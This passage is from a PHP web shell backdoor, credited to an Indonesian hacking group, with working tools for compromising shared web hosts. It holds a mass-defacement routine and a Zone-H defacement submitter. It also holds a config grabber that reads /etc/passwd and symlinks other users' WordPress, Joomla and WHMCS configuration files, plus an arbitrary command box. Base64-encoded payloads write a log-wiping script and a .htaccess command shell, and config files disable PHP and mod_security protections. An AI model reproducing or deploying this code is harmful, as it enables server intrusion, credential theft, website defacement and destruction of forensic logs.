2140. <td>File Name</td><td><input class ='inputz' style='background:black;' type='text' name='file' size='60' value="index.html"></td>
2141. </tr>
2142. </tr>
2143. <table class="tabnet" >
2144. <th colspan='5'><b>File Code Mass Deface</b></th>
2145. <tr><td></td><td>
2146. <table><textarea align="center" style='background:black;' name='index' rows='15' cols='80'><?=$script_deface; ?></textarea><br>
2147. <center><input class='inputzbut' type='submit' value="&nbsp;&nbsp;Mass Deface&nbsp;&nbsp;"></center></form></table></table></table></table>
2148. <br></form>
2149. <?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}}
2150. /////////////
2151. /////////////////////////////////////////////////////////////////
2152.  
2153. elseif(isset($_GET['x']) && ($_GET['x'] == 'zone'))
2154. { @ini_set('output_buffering',0);
2155. echo "
2156. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2157.  
2158. <tr>
2159. <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2160. <center><b><font size=5 style=italic color=#00ff00>Zone-H Submiter</font></b></center></td></tr></table>
2161. ";
2162. ?>
2163. <form action="?y=<?=$pwd; ?>&amp;x=zone" method="post">
2164.  
2165. <br><br><center>
2166. <!-- Zone-H -->
2167. <form action="" method='POST'><table><table class='tabnet'>
2168. <td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><b>Zone-H Defacer</b></th></tr></td></tr><td height='45' colspan='2'><form method="post">
2169. <input type="text" class="inputz" name="defacer" style="background:black;" placeholder="Name Of Defacer" />
2170. <select name="hackmode" class="inputz" >
2171. <option >---------------------------Select One---------------------------</option>
2172. <option value="1">Known Vulnerability (i.e. Unpatched System)</option>
2173. <option value="2" >Undisclosed (new) Vulnerability</option>
2174. <option value="3" >Configuration / Admin Mistake</option>
2175. <option value="4" >Brute Force Attack</option>
2176. <option value="5" >Social Engineering</option>
2177. <option value="6" >Web Server Intrusion</option>
2178. <option value="7" >Web Server External Module Intrusion</option>
2179. <option value="8" >Mail Server Intrusion</option>
2180. <option value="9" >FTP Server Intrusion</option>
2181. <option value="10" >SSH Server Intrusion</option>
2182. <option value="11" >Telnet Server Intrusion</option>
2183. <option value="12" >RPC Server Intrusion</option>
2184. <option value="13" >Shares Misconfiguration</option>
2185. <option value="14" >Other Server Intrusion</option>
2186. <option value="15" >SQL Injection</option>
2187. <option value="16" >URL Poisoning</option>
2188. <option value="17" >File Inclusion</option>
2189. <option value="18" >Other Web Application Bug</option>
2190. <option value="19" >Remote Administrative Panel Access Bruteforcing</option>
2191. <option value="20" >Remote Administrative Panel Access Password Guessing</option>
2192. <option value="21" >Remote Administrative Panel Access Social Engineering</option>
2193. <option value="22" >Attack Against Administrator(Password StealingSniffing)</option>
2194. <option value="23" >Access Credentials Through Man In the Middle Attack</option>
2195. <option value="24" >Remote Service Password Guessing</option>
2196. <option value="25" >Remote Service Password Bruteforce</option>
2197. <option value="26" >Rerouting After Attacking The Firewall</option>
2198. <option value="27" >Rerouting After Attacking The Router</option>
2199. <option value="28" >DNS Attack Through Social Engineering</option>
2200. <option value="29" >DNS Attack Through Cache Poisoning</option>
2201. <option value="30" >Not available</option>
2202. </select>
2203.  
2204. <select name="reason" class="inputz" >
2205. <option >---------------Select One-----------------</option>
2206. <option value="1" >Heh...Just For Fun!</option>
2207. <option value="2" >Revenge Against That Website</option>
2208. <option value="3" >Political Reasons</option>
2209. <option value="4" >As a Challenge</option>
2210. <option value="5" >I Just Want To Be The Best Defacer</option>
2211. <option value="6" >Patriotism</option>
2212. <option value="7" >Not Available</option>
2213. </select>
2214. <input type="hidden" name="action" value="zone"><tr><td>
2215. <center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains" placeholder="List Of Domains"></textarea>
2216. <br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
2217. </form></td></tr></table></form>
2218. <!-- End Of Zone-H -->
2219. </td></center><br><br>
2220.  
2221. <?php
2222. function ZoneH($url, $hacker, $hackmode,$reson, $site )
2223. {
2224. $k = curl_init();
2225. curl_setopt($k, CURLOPT_URL, $url);
2226. curl_setopt($k,CURLOPT_POST,true);
2227. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
2228. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2229. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2230. $kubra = curl_exec($k);
2231. curl_close($k);
2232. return $kubra;
2233. }
2234. {
2235. ob_start();
2236. $sub = @get_loaded_extensions();
2237. if(!in_array("curl", $sub))
2238. {
2239. die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
2240. }
2241.  
2242. $hacker = $_POST['defacer'];
2243. $method = $_POST['hackmode'];
2244. $neden = $_POST['reason'];
2245. $site = $_POST['domain'];
2246. if (empty($hacker))
2247. { die ("<center><b> </b></center>"); }
2248. elseif($method == "--------SELECT--------")
2249. { die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>"); }
2250. elseif($neden == "--------SELECT--------")
2251. { die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>"); }
2252. elseif(empty($site))
2253. { die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>"); }
2254. $i = 0;
2255. $sites = explode("\n", $site);
2256. while($i < count($sites))
2257. {
2258. if(substr($sites[$i], 0, 4) != "http")
2259. {
2260. $sites[$i] = "http://".$sites[$i];
2261. }
2262. ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
2263. echo "$sites[$i]";
2264. ++$i;
2265. }
2266.  
2267. }
2268.  
2269.  
2270. }
2271. /////////////////////////////////////////////////////////////////////////////////////////////
2272. ////////////////////////////////////////////////////////////////////////////
2273. elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
2274. echo "
2275. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2276.  
2277. <tr>
2278. <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2279. <center><b><font size=5 style=italic color=#00ff00>Config Grabber</font></b></center></td></tr></table>
2280. ";
2281. ?>
2282. <form action="?y=<?=$pwd; ?>&x=grabc" method="post">
2283.  
2284. <?php
2285. echo "
2286. <form method='POST'>
2287. </head>
2288. <style>
2289. textarea {
2290. resize:none;
2291. color: #000000 ;
2292. background-color:#000000;
2293. font-size:8pt; color:#ffffff;
2294.  
2295. width:550px;
2296. height:400px;
2297. }
2298. input {
2299. color: #000000;
2300. border:1px dotted white;
2301. }
2302. </style>";
2303. echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><br><form method="POST"><table class="tabnet" >
2304. <th colspan='5'><b>Config Grabber</b></th></center>
2305. <tr><td></td><td><table><textarea name="passwd" class='area' rows='15' cols='60'><?=file_get_contents('/etc/passwd'); ?></textarea><br>
2306. <center><input name="config" style="width:550px;" class='inputzbut' value="&nbsp;&nbsp;Grab!&nbsp;&nbsp;" type="submit"></form></center></table></table>
2307. <?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('explodedcgrab', 0755);@chdir('explodedcgrab');
2308. $htaccess="
2309. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
2310. Options Indexes FollowSymLinks
2311. ForceType text/plain
2312. AddType text/plain .php
2313. AddType text/plain .html
2314. AddType text/html .shtml
2315. AddType txt .php
2316. AddHandler server-parsed .php
2317. AddHandler txt .php
2318. AddHandler txt .html
2319. AddHandler txt .shtml
2320. Options All
2321. Options All
2322. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
2323. Options Indexes FollowSymLinks
2324. ForceType text/plain
2325. AddType text/plain .php
2326. AddType text/plain .html
2327. AddType text/html .shtml
2328. AddType txt .php
2329. AddHandler server-parsed .php
2330. AddHandler txt .php
2331. AddHandler txt .html
2332. AddHandler txt .shtml
2333. Options All
2334. Options All";
2335. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
2336. $passwd=explode("\n",$passwd);
2337. echo "<br><br><center><font color=#b0b000 size=2pt>wait ...</center><br>";
2338. foreach($passwd as $pwd){
2339. $pawd=explode(":",$pwd);$user =$pawd[0];
2340. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
2341. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
2342. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
2343. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
2344. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
2345. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
2346. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
2347. @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
2348. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
2349. @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
2350. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
2351. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
2352. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
2353. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
2354. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
2355. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
2356. @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
2357. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
2358. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
2359. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
2360. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
2361. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
2362. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
2363. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
2364. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
2365. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
2366. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
2367. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
2368. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
2369. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
2370. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
2371. @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
2372. @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
2373. @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
2374. @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
2375. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
2376. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
2377. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
2378. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
2379. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
2380. echo '<b class="cone"><font face="Tahoma" color="#00dd00" size="2pt"><b>Done -></b> <a target="_blank" href="explodedcgrab">Open configs</a></font></b>';}
2381. }
2382. ////////////////////////////////////
2383. elseif(isset($_GET['x']) && ($_GET['x'] == 'about'))
2384. {@ini_set('output_buffering',0);
2385. echo "
2386. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2387.  
2388. <tr>
2389. <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2390. <center><b><font size=5 style=italic color=#00ff00>About</font></b></center></td></tr></table>
2391. ";
2392. ?><form action="?y=<?=$pwd; ?>&x=about" method="post"><center><br><br><div class='msupiani'><img src='https://dncache-mauganscorp.netdna-ssl.com/cropped-wallpapers/1236/1236914-1366x768-[DesktopNexus.com].jpg?st=ibJVW4RB2I3lR_A8JwHNzg&e=1491982925'/></div>
2393. <br><br><br><font size="10" color="#00ff00"><b>Thanks To :</b><br><br><br></font></center><center><marquee direction="up" scrollamount="2" bgcolor="" width="250" height="100"><center>
2394. <p><b><font size="3" color="#00ff00">Allah S.W.T<br><br>My Parent<br>Rifkii khalifa<br>All Member Security Ghost<br>t<br><br>
2395. =[ Grub & Forum ]=<br><br>Pentest & Security Indonesia<br>Kali Linux Indonesia<br>Surabaya Black Hat<br>Indonesian Backtrack Team<br><br><br><br>By<br>Security Ghost<br><br>Special Present To :<BR><center><img src="http://www.clker.com/cliparts/W/q/D/p/e/7/small-red-heart-with-transparent-background-hi.png" width='20' height='20'></center>Yulia Susanti<br><br>18 Mar 2014<br>
2396. </font></b></p></center></marquee></center><embed src="<?=$music;?>" autostart="TRUE" loop="TRUE" width="0" height="0"></embed><br><br><br>
2397. <?php
2398. }
2399. /////////////////////////////////////
2400. elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?><form action="?y=<?=$pwd; ?>&amp;x=shell" method="post"><table class="cmdbox">
2401. <tr><td colspan="2"><textarea class="output" readonly><?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']);} ?></textarea>
2402. <tr><td colspan="2"><?=$prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
2403. </table></form><?php }
2404. else {
2405. if(isset($_GET['delete']) && ($_GET['delete'] != "")){
2406. $file = $_GET['delete'];
2407. @unlink($file);
2408. }
2409. elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
2410. @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
2411. }
2412. elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
2413. $path = $pwd.$_GET['mkdir'];
2414. @mkdir($path);
2415. }
2416. $buff = showdir($pwd,$prompt);
2417. echo $buff;
2418. }
2419. //////////////////////////////////////
2420. ?>
2421. <br><table class="tabnet" >
2422. <tr><form method="post" action="">&nbsp;<td><select class="inputzbut" align="left" name="pilihan" id="pilih"><option value=""selected>------[ Select Your Favorit Tools ]------</option><option value="htasell">htaccess Shell [ .htaccess ]</option><option value="slc" >Server Log Cleaner [ serverLC.sh ]</option><option value="ini">Bypass Disable Function in Apache</option><option value="inis">Bypass Disable Function in Litespeed</option></select>
2423. <input type="submit" name="submites" class="inputzbut" value="Created">
2424. </td></form></tr></table>
2425. <?php
2426. $submit = $_POST ['submites'];
2427. if(isset($submit)) {
2428. $pilih = $_POST['pilihan'];
2429. if ( $pilih == 'ini') {
2430. $byphp = "safe_mode = Off \n disable_functions = None \n safe_mode_gid = OFF \n open_basedir = OFF \n allow_url_fopen = On";
2431. $byht = "<IfModule mod_security.c> \n SecFilterEngine Off \n SecFilterScanPOST Off \n SecFilterCheckURLEncoding Off \n SecFilterCheckUnicodeEncoding Off \n </IfModule>";
2432. $iniphp = '<? \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["file"]); \n ini_restore("safe_mode"); \n ini_restore("open_basedir"); \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["ss"]; \n ?>';
2433. file_put_contents("php.ini",$byphp);
2434. file_put_contents(".htaccess",$byht);
2435. file_put_contents("ini.php",$iniphp);
2436. echo "<script>alert('Disable Functions in Apache Created'); hideAll();</script>";
2437. die();
2438. }
2439. elseif ( $pilih == 'inis') {
2440. $iniph = '<?php \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["file"]); \n ini_restore("safe_mode"); \n ini_restore("open_basedir"); \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["ss"]; \n ?>';
2441. $byph = "safe_mode = Off \n disable_functions= ";
2442. $comp="PEZpbGVzICoucGhwPg0KRm9yY2VUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwNA0KPC9GaWxlcz4=";
2443. file_put_contents("php.ini",base64_decode($byph));
2444. file_put_contents("ini.php",base64_decode($iniph));
2445. file_put_contents(".htaccess",base64_decode($comp));
2446. echo "<script>alert('Disable Functions in Litespeed Created'); hideAll();</script>";
2447. die();
2448. }
2449.  
2450. elseif ( $pilih == 'slc') {
2451. $slc ="IyEvYmluL3NoDQojIFJlY29kZWQgQnkgLi9Qb3J0MjIgKE1TdXBpYW4pDQojIEdyMzN0eiA6IEFsbCBNZW1iZXJzIE9mIFNlY3VyaXR5IEV4cGxvZGVkDQojIGNobW9kIDA3NTUgc2VydmVyTEMuc2ggPj4gLi9zZXJ2ZXJMQy5zaA0KDQplY2hvICJbKl0gR29pbmcgVG8gRGVsZXRlIExvZyBTZXJ2ZXJzIC4uLiAiDQpmaW5kIC8gLW5hbWUgKi5iYXNoX2hpc3RvcnkgLWV4ZWMgcm0gLXJmIHt9IFw7DQpmaW5kIC8gLW5hbWUgKi5iYXNoX2xvZ291dCAtZXhlYyBybSAtcmYge30gXDsNCmZpbmQgLyAtbmFtZSAibG9nKiIgLWV4ZWMgcm0gLXJmIHt9IFw7DQpmaW5kIC8gLW5hbWUgKi5sb2cgLWV4ZWMgcm0gLXJmIHt9IFw7DQpybSAtcmYgL3RtcC9sb2dzDQpybSAtcmYgJEhJU1RGSUxFDQpybSAtcmYgL3Jvb3QvLmtzaF9oaXN0b3J5DQpybSAtcmYgL3Jvb3QvLmJhc2hfaGlzdG9yeQ0Kcm0gLXJmIC9yb290Ly5rc2hfaGlzdG9yeQ0Kcm0gLXJmIC9yb290Ly5iYXNoX2xvZ291dA0Kcm0gLXJmIC91c3IvbG9jYWwvYXBhY2hlL2xvZ3MNCnJtIC1yZiAvdXNyL2xvY2FsL2FwYWNoZS9sb2cNCnJtIC1yZiAvdmFyL2FwYWNoZS9sb2dzDQpybSAtcmYgL3Zhci9hcGFjaGUvbG9nDQpybSAtcmYgL3Zhci9ydW4vdXRtcA0Kcm0gLXJmIC92YXIvbG9ncw0Kcm0gLXJmIC92YXIvbG9nDQpybSAtcmYgL3Zhci9hZG0NCnJtIC1yZiAvZXRjL3d0bXANCnJtIC1yZiAvZXRjL3V0bXANCg0KZWNobyAiWypdIERvbmUgLiBHb29kIEx1Y2sgOyki";
2452. file_put_contents("serverLC.sh",base64_decode($slc));
2453. echo "<script>alert('Server Log Cleaner [ serverLC.sh ] Created'); hideAll();</script>";
2454. die();
2455. }
2456. elseif ( $pilih == 'htasell') {
2457. $ht = 'PEZpbGVzIH4gIl5cLmh0Ij4NCk9yZGVyIGFsbG93LGRlbnkNCkFsbG93IGZyb20gYWxsDQo8L2ZpbGVzPg0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLXBocCAuaHRhY2Nlc3MNCiMgPD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTs/Pg0K';
2458. file_put_contents(".htaccess",base64_decode($ht));
2459. echo "<script>alert('htaccess Shell [ .htaccess ] Created : open in site/.htaccess?cmd= '); hideAll();</script>";
2460. die();
2461. }
2462.  
2463. }
2464.  
2465. ?><br><br> <div class="footer"><b style="color:$color;font-family:monotype corsiva;font-size:22;"><?=$title; ?> <?=$versi ?> Shell Backdoor</b></div>
2466. <div class="jaya"> &copy; <?=date('Y',time()); ?> <a href=""><?=$xName ?></a></div></div>
2467. </body>
2468. </html>